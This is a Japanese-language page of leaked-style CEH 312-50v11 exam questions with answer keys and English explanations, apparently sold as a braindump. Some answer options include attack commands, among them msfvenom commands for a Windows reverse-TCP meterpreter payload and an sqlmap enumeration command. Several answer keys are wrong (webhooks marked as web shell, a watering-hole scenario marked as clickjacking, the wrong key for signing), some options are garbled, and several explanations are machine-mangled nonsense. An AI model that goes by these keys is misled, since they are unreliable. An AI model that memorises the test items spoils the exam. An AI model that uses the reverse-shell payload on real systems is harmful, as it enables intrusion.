Fast2test 312-50v11日本語リアル試験問題解答は更新された[2024年07月17日]
お手軽に合格させる 最新EC-COUNCIL 312-50v11日本語問題集には525問があります
質問 # 152
以下は、ネットワークIDSによってキャプチャされたエントリです。このエントリを分析するタスクが割り当てられます。値0x90に気づきました。これは、Intelプロセッサの最も一般的なNOOP命令です。攻撃者がバッファオーバーフロー攻撃を試みていることがわかります。
また、出力のASCII部分に「/ bin / sh」があります。
アナリストとして、あなたは攻撃について何を結論付けますか?
- A. 攻撃者は侵入先のマシンにディレクトリを作成しています
- B. 攻撃者はバッファオーバーフロー攻撃を試みて成功しました
- C. 攻撃者は、コマンドラインシェルを起動するエクスプロイトを試みています
- D. バッファオーバーフロー攻撃はIDSによって無効化されました
正解:C
質問 # 153
ソフトウェア開発者のスーザンは、自分のWebAPIが他のアプリケーションを最新の情報で更新することを望んでいます。この目的のために、彼女はトリガーイベントに基づいて発生するユーザー定義のHTTPテールバックまたはプッシュAPIを使用します。呼び出されると、この機能は他のアプリケーションにデータを提供し、ユーザーがリアルタイムの情報を即座に受信できるようにします。
次のテクニックのどれがスーザンによって採用されていますか?
- A. Webhoos
- B. REST API
- C. ウェブシェル
- D. SOAP API
正解:C
質問 # 154
トロイの木馬の用語では、秘密チャネルとは何ですか?
- A. セキュリティポリシーに違反する方法でコンピュータシステムまたはネットワーク内で情報を転送するチャネル
- B. 検出をマスクするためにブートプロセスとサービスを非表示にするカーネル操作です
- C. HTTPプロトコルの代わりにHTTPSプロトコルを使用して接続を確立するリバーストンネリング技術です
- D. データ転送のためのコンピュータシステムまたはネットワーク内の正当な通信パス
正解:A
質問 # 155
Webサーバーのフットプリント中にWebサイトの構造を発見するための豊富なターゲットは、どのファイルですか?
- A. ドキュメントルート
- B. domain.oct
- C. Robots.txt
- D. index.html
正解:A
解説:
Explanation
The document root is a directory (a folder) that is stored on your host's servers and that is designated for holding web pages. When someone else looks at your web site, this is the location they will be accessing.
In order for a website to be accessible to visitors, it must be published to the correct directory, the "document root." You might think that there would only be one directory in your space on your host's servers, but often hosts provide services beyond just publishing a website. In this case, they are likely to set up every account with several directories, since each service would require its own.
質問 # 156
プロのハッカーであるJoelは、企業を標的にして、従業員が頻繁にアクセスするWebサイトの種類を特定しました。彼はこの情報を使用して、これらのWebサイトの抜け穴の可能性を検索し、Webページからユーザーをリダイレクトしてマルウェアを被害者のマシンにダウンロードする可能性のある悪意のあるスクリプトを挿入しました。 Joelは、被害者のマシンを危険にさらすために、被害者が感染したWebアプリケーションにアクセスするのを待ちます。上記のシナリオでジョエルが使用しているテクニックは次のうちどれですか?
- A. 水飲み場型攻撃
- B. クリックジャッキング攻撃
- C. MarioNet攻撃
- D. DNS再バインド攻撃
正解:B
質問 # 157
次のツールのどれが列挙に使用されますか? (3つ選択してください。)
- A. クフ
- B. SolarWinds
- C. DumpSec
- D. USER2SID
- E. SID2USER
正解:C、D、E
質問 # 158
どのタイプのセキュリティ機能が、車両が建物のドアを通って衝突するのを防ぎますか?
- A. ボラード
- B. 回転式改札口
- C. マントラップ
- D. 受付係
正解:A
質問 # 159
MSFvenomを使用してWindows用の逆TCPシェルコードを生成する正しい方法は何ですか?
- A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
- B. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
- C. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
- D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
正解:B
質問 # 160
組織は、WebアプリケーションおよびWebサーバーの攻撃に対するセキュリティを強化することを決定しました。組織のセキュリティ担当者であるJohnは、セキュリティスキャナーを使用して、Webアプリケーションのセキュリティテストを自動化し、組織のWebインフラストラクチャをWebアプリケーションの脅威から保護しました。彼はまた、そのツールを使用して、XSS、ディレクトリトラバーサルの問題、フォールトインジェクション、SQLインジェクション、コマンドの実行の試み、およびその他のいくつかの攻撃を検出したいと考えています。次のセキュリティスキャナーのうち、ジョンが上記のタスクを実行するのに役立つのはどれですか?
- A. Saleaeロジックアナライザー
- B. AlienVault®OSSIM™
- C. ASyhuntハイブリッド
- D. Cisco ASA
正解:C
質問 # 161
特定のWebサイトに対して侵入テストを実行し始め、メインページからすべてのリンクを取得することから始めることにしました。
マイルストーンを達成するための最良のLinuxパイプは何ですか?
- A. curl -s https://sile.com | grep ''< a href-\'http" | grep "Site-com- | cut -d "V" -f 2
- B. wgethttps://site.com | cut-d"http-
- C. dirb https://site.com | grep "site"
- D. wget https://stte.com | grep "< a href=\*http" | grep "site.com"
正解:D
質問 # 162
次のコマンドは何に使用されますか?
sqlmap.py-u ,, http://10.10.1.20/?p = 1&forumaction = search "-dbs
- A. URLのDBMS内のデータベースを列挙する
- B. 指定されたIPアドレスでデータベースステートメントを検索する
- C. SQLインジェクションを使用したバックドアの作成
- D. データベースで実行されているSQLステートメントを取得しています
正解:A
質問 # 163
昼食のラッシュの後、許可されていない個人が従業員の入り口から従業員に続いて建物に入る。個人が実行したばかりの違反の種類は何ですか?
- A. リバースソーシャルエンジニアリング
- B. テールゲーティング
- C. 発表
- D. ピギーバッキング
正解:B
質問 # 164
トロイの木馬の用語では、秘密チャネルとは何ですか?
- A. セキュリティポリシーに違反する方法でコンピュータシステムまたはネットワーク内で情報を転送するチャネル
- B. 検出をマスクするためにブートプロセスとサービスを非表示にするカーネル操作です
- C. HTTPプロトコルの代わりにHTTPSプロトコルを使用して接続を確立するリバーストンネリング技術です
- D. データ転送のためのコンピュータシステムまたはネットワーク内の正当な通信パス
正解:A
質問 # 165
LoTデバイスが危険にさらされている疑いがある場合に最初にブロックするポートは何ですか?
- A. 0
- B. 1
- C. 2
- D. 3
正解:B
解説:
Explanation
You can perceive Port 443 as an online browsing port wont to secure browser communication or HTTPS services.
It will offer coding and transport over secure ports. Thus, the information you transfer across such connections are extremely proof against third-party eavesdropping and interruption.
Moreover, the identity of the server that you just connect remotely may be documented confidently.
Once the association is established, internet browsers can show signs sort of a padlock, Associate in Nursing unbroken key, etc. within the standing region of your window, informing you regarding the secured connections.
Though Port 443 is that the commonplace port for HTTPS traffic, HTTPS port 443 also can support HTTP sites. just in case the positioning uses HTTPS however is unable to load over port 443, port eighty that handles all unencrypted HTTP internet traffic can step in to load the HTTPS-enabled web site.
質問 # 166
ボットネットを作成します。攻撃者はいくつかの手法を使用して、脆弱なマシンをスキャンできます。攻撃者はまず、多数の脆弱なマシンに関する情報を収集してリストを作成します。その後、それらはマシンに感染します。リストは、リストの半分を新たに侵害されたマシンに割り当てることによって分割されます。スキャンプロセスは同時に実行されます。この手法により、悪意のあるコードの拡散とインストールが短時間で確実に行われます。
ここではどの手法について説明しますか?
- A. ヒットリストスキャン手法
- B. サブネットスキャン技術
- C. 順列スキャン手法
- D. トポロジースキャン技術
正解:A
解説:
Explanation
One of the biggest problems a worm faces in achieving a very fast rate of infection is "getting off the ground." although a worm spreads exponentially throughout the early stages of infection, the time needed to infect say the first 10,000 hosts dominates the infection time.
There is a straightforward way for an active worm a simple this obstacle, that we term hit-list scanning. Before the worm is free, the worm author collects a listing of say ten,000 to 50,000 potentially vulnerable machines, ideally ones with sensible network connections. The worm, when released onto an initial machine on this hit-list, begins scanning down the list. once it infects a machine, it divides the hit-list in half, communicating half to the recipient worm, keeping the other half.
This fast division ensures that even if only 10-20% of the machines on the hit-list are actually vulnerable, an active worm can quickly bear the hit-list and establish itself on all vulnerable machines in only some seconds.
though the hit-list could begin at 200 kilobytes, it quickly shrinks to nothing during the partitioning. This provides a great benefit in constructing a quick worm by speeding the initial infection.
The hit-list needn't be perfect: a simple list of machines running a selected server sort could serve, though larger accuracy can improve the unfold. The hit-list itself is generated victimization one or many of the following techniques, ready well before, typically with very little concern of detection.
* Stealthy scans. Portscans are so common and then wide ignored that even a quick scan of the whole net would be unlikely to attract law enforcement attention or over gentle comment within the incident response community. However, for attackers wish to be particularly careful, a randomised sneaky scan taking many months would be not possible to attract much attention, as most intrusion detection systems are not currently capable of detecting such low-profile scans. Some portion of the scan would be out of date by the time it had been used, however abundant of it'd not.
* Distributed scanning. an assailant might scan the web using a few dozen to some thousand already-compromised "zombies," the same as what DDOS attackers assemble in a very fairly routine fashion. Such distributed scanning has already been seen within the wild-Lawrence Berkeley National Laboratory received ten throughout the past year.
* DNS searches. Assemble a list of domains (for example, by using wide offered spam mail lists, or trolling the address registries). The DNS will then be searched for the science addresses of mail-servers (via mx records) or net servers (by looking for www.domain.com).
* Spiders. For net server worms (like Code Red), use Web-crawling techniques the same as search engines so as to produce a list of most Internet-connected web sites. this would be unlikely to draw in serious attention.
* Public surveys. for many potential targets there may be surveys available listing them, like the Netcraft survey.
* Just listen. Some applications, like peer-to-peer networks, wind up advertising many of their servers.
Similarly, many previous worms effectively broadcast that the infected machine is vulnerable to further attack. easy, because of its widespread scanning, during the Code Red I infection it was easy to select up the addresses of upwards of 300,000 vulnerable IIS servers-because each came knock on everyone's door!
質問 # 167
セキュリティの専門家であるRebeccaは、安全で安全な通信のためにWebサービスを使用する従業員を認証したいと考えています。このプロセスでは、SOAPの拡張であるWebサービスアーキテクチャのコンポーネントを使用し、SOAPメッセージの整合性と機密性を維持できます。
Rebeccaが通信を保護するために使用するWebサービスアーキテクチャのコンポーネントは次のうちどれですか?
- A. WSワークプロセス
- B. WS-Security
- C. WS-Policy
- D. WSDL
正解:B
質問 # 168
チームメンバーの1人が、次のSOAレコードを分析するように依頼しました。バージョンは何ですか?
Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu(200302028 3600 3600 604800 2400。)(4つ選択してください。)
- A. 0
- B. 1
- C. 2
- D. 3
- E. 4
- F. 5
正解:F
質問 # 169
プロのハッカーであるモリスは、ネットワーク上のトラフィックをスニッフィングして、アクティブなシステム、ネットワークサービス、アプリケーション、および脆弱性を特定することにより、ターゲット組織に対して脆弱性スキャンを実行しました。彼はまた、現在ネットワークにアクセスしているユーザーのリストを取得しました。モリスが対象組織に対して実施した脆弱性評価の種類は何ですか?
- A. 受動的評価
- B. 資格評価
- C. 内部評価
- D. 外部評価
正解:A
解説:
Detached weakness evaluation adopts an interesting strategy: In checking network traffic, it endeavors to order a hub's working framework, ports and benefits, and to find weaknesses a functioning scan like Nessus or Qualys probably won't discover on the grounds that ports are hindered or another host has come on the web. The information may then give setting to security occasions, for example, relating with IDS alarms to lessen bogus positives.
Uninvolved investigation offers two key points of interest. The first is perceivability. There's regularly a wide hole between the thing you believe is running on your organization and what really is. Both organization and host scan report just what they see. Scan are obstructed by organization and host firewalls. In any event, when a host is live, the data accumulated is here and there restricted to flag checks and some noninvasive setup checks. In the event that your scan has the host certifications, it can question for more data, however bogus positives are an immense issue, you actually may not see everything. Further, rootkits that introduce themselves may run on a nonscanned port or, on account of UDP, may not react to an irregular test. On the off chance that a functioning weakness appraisal scan doesn't see it, it doesn't exist to the scan.
Host firewalls are regular even on worker PCs, so how would you identify a rebel worker or PC with a functioning output? An inactive sensor may see mavericks on the off chance that they're visiting on the organization; that is perceivability a scanner won't give you. A detached sensor likewise will recognize action to and from a port that isn't generally filtered, and may identify nonstandard port utilization, given the sensor can interpret and order the traffic. For instance, basic stream examination won't distinguish SSH or telnet on Port 80, however convention investigation may.
The subsequent significant favorable position of inactive investigation is that it's noninvasive- - it doesn't intrude on organization tasks. Dynamic weakness evaluation scanners are obtrusive and can disturb administrations, regardless of their designers' endeavors to limit the potential for blackouts. In any event, utilizing alleged safe sweeps, we've taken out switches, our NTP administration and a large group of other basic framework segments. Quite a long while prior, we even bobbed our center switch twice with a nmap port output.
質問 # 170
ボブは、アリスが自分のメッセージが改ざんされていないかどうかを確認できるようにしたいと考えています。彼はメッセージのチェックサムを作成し、非対称暗号化を使用してメッセージを暗号化します。ボブは、この目標を達成するためにチェックサムを暗号化するためにどのキーを使用しますか?
- A. 彼自身の秘密鍵
- B. アリスの秘密鍵
- C. 彼自身の公開鍵
- D. アリスの公開鍵
正解:D
質問 # 171
......
最新の312-50v11日本語学習ガイド2024年最新の- 提供するのはテストエンジンとPDF:https://jp.fast2test.com/312-50v11_JPN-premium-file.html